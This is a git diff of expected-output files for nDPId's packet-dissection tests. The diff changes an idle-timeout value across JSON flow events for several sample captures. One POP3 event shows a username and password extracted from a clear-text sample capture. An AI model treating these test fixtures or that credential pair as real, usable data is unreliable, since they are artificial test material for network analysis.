+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359646,"flow_last_seen":1648373359662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373358908,"flow_last_seen":1648373359037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5045,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357854,"flow_last_seen":1648373357906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357861,"flow_last_seen":1648373357922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373355763,"flow_last_seen":1648373356334,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6491,"flow_avg_l4_payload_len":721,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","packets-captured":44,"packets-processed":44,"total-skipped-flows":0,"total-l4-data-len":26716,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1648373359681} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 44/44 diff --git a/test/results/pop3.pcap.out b/test/results/pop3.pcap.out index 6318b1f5e..5dfec9c8e 100644 --- a/test/results/pop3.pcap.out +++ b/test/results/pop3.pcap.out @@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pop3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1349776771892} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1349776771892,"flow_last_seen":1349776771892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1349776771892,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1349776771892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776771892,"pkt":"ABffs8QAAMCfw1sHCABFEAA8\/wtAAEAGdh2P4eW1StAFHInXAG5gksK3AAAAAKACFtDFsQAAAgQFtAQCCAoAYD28AAAAAAEDAwY="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1349776772030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776772030,"pkt":"AMCfw1sHABffs8QACABFAAA8AABAADUGgDlK0AUcj+HltQBuidcdXnV7YJLCuKASFqDzqQAAAgQFtAQCCApTpKX2AGA9vAEDAwk="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1349776772030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1349776772030,"pkt":"ABffs8QAAMCfw1sHCABFEAA0\/wxAAEAGdiSP4eW1StAFHInXAG5gksK4HV51fIAQAFzFqQAAAQEICgBgPkZTpKX2"} -00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1349776771892,"flow_last_seen":1349776771892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1349776771892,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1349776771892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776771892,"pkt":"ABffs8QAAMCfw1sHCABFEAA8\/wtAAEAGdh2P4eW1StAFHInXAG5gksK3AAAAAKACFtDFsQAAAgQFtAQCCAoAYD28AAAAAAEDAwY="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1349776772030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776772030,"pkt":"AMCfw1sHABffs8QACABFAAA8AABAADUGgDlK0AUcj+HltQBuidcdXnV7YJLCuKASFqDzqQAAAgQFtAQCCApTpKX2AGA9vAEDAwk="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1349776772030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1349776772030,"pkt":"ABffs8QAAMCfw1sHCABFEAA0\/wxAAEAGdiSP4eW1StAFHInXAG5gksK4HV51fIAQAFzFqQAAAQEICgBgPkZTpKX2"} +00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}} +00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":31,"total-skipped-flows":0,"total-l4-data-len":1853,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1349776799209} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 31/31 diff --git a/test/results/pops.pcapng.out b/test/results/pops.pcapng.out index 453a35e46..fde9e9d28 100644 --- a/test/results/pops.pcapng.out +++ b/test/results/pops.pcapng.out @@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pops.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614938117011} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614938117011,"flow_last_seen":1614938117011,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614938117011,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938117011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117011,"pkt":"AAAAAAAAAAgACwgJCABFAAA0BaxAAH8GIWTAqAABCgoKAdclA+N8RI7kAAAAAIACIACU+AAAAgQE7AEDAwIBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938117270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117270,"pkt":"AAAAAAAAAAgACwgJCABFAAA0AABAADMGcxAKCgoBwKgAAQPj1yVpzHIcfESO5YASchBmIQAAAgQFtAEBBAIBAwMH"} -00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938117298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1614938117298,"pkt":"AAAAAAAAAAgACwgJCABFAADgBbBAAH8GILTAqAABCgoKAdclA+N8RI7lacxyHVAYQTecFQAAFgMDALMBAACvAwNgQf\/5kgLNNRPYdtFiHEoPzfeU37\/0FcJ+JWxvuPQRAgAAOMAowCfAFMATAJ8AngA5ADMAnQCcAD0APAA1AC\/ALMArwCTAI8AKwAkAagBAADgAMgAKABMABQAEAQAATgAAABkAFwAAFHBvcC5zZWN1cmVzZXJ2ZXIubmV0AAoABgAEABcAGAALAAIBAAANABQAEgYBBgMEAQUBAgEEAwUDAgMCAgAXAAD\/AQABAA=="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938117011,"flow_last_seen":1614938117298,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1614938117298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1614938117011,"flow_last_seen":1614938117559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2704,"flow_avg_l4_payload_len":540,"midstream":0,"thread_ts_msec":1614938117559,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614938117011,"flow_last_seen":1614938117011,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614938117011,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938117011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117011,"pkt":"AAAAAAAAAAgACwgJCABFAAA0BaxAAH8GIWTAqAABCgoKAdclA+N8RI7kAAAAAIACIACU+AAAAgQE7AEDAwIBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938117270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117270,"pkt":"AAAAAAAAAAgACwgJCABFAAA0AABAADMGcxAKCgoBwKgAAQPj1yVpzHIcfESO5YASchBmIQAAAgQFtAEBBAIBAwMH"} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938117298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1614938117298,"pkt":"AAAAAAAAAAgACwgJCABFAADgBbBAAH8GILTAqAABCgoKAdclA+N8RI7lacxyHVAYQTecFQAAFgMDALMBAACvAwNgQf\/5kgLNNRPYdtFiHEoPzfeU37\/0FcJ+JWxvuPQRAgAAOMAowCfAFMATAJ8AngA5ADMAnQCcAD0APAA1AC\/ALMArwCTAI8AKwAkAagBAADgAMgAKABMABQAEAQAATgAAABkAFwAAFHBvcC5zZWN1cmVzZXJ2ZXIubmV0AAoABgAEABcAGAALAAIBAAANABQAEgYBBgMEAQUBAgEEAwUDAgMCAgAXAAD\/AQABAA=="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938117011,"flow_last_seen":1614938117298,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1614938117298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1614938117011,"flow_last_seen":1614938117559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2704,"flow_avg_l4_payload_len":540,"midstream":0,"thread_ts_msec":1614938117559,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-data-len":2704,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614938117559} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 diff --git a/test/results/pps.pcap.out b/test/results/pps.pcap.out index 895ca0fb8..4cd647cb0 100644 --- a/test/results/pps.pcap.out +++ b/test/results/pps.pcap.out @@ -33,12 +33,12 @@ 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1467353136483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1467353136483,"pkt":"TF4M6gNlABxCjnAxCABFAABHf1sAAIARGYnAqHMIt+S2LFkJNlkAMzZRK4B+aGhJxenIZriZ1dfXqamg+fjwxMU1UFBQXFw8PHdzc3Nzc\/PMztbWAA=="} 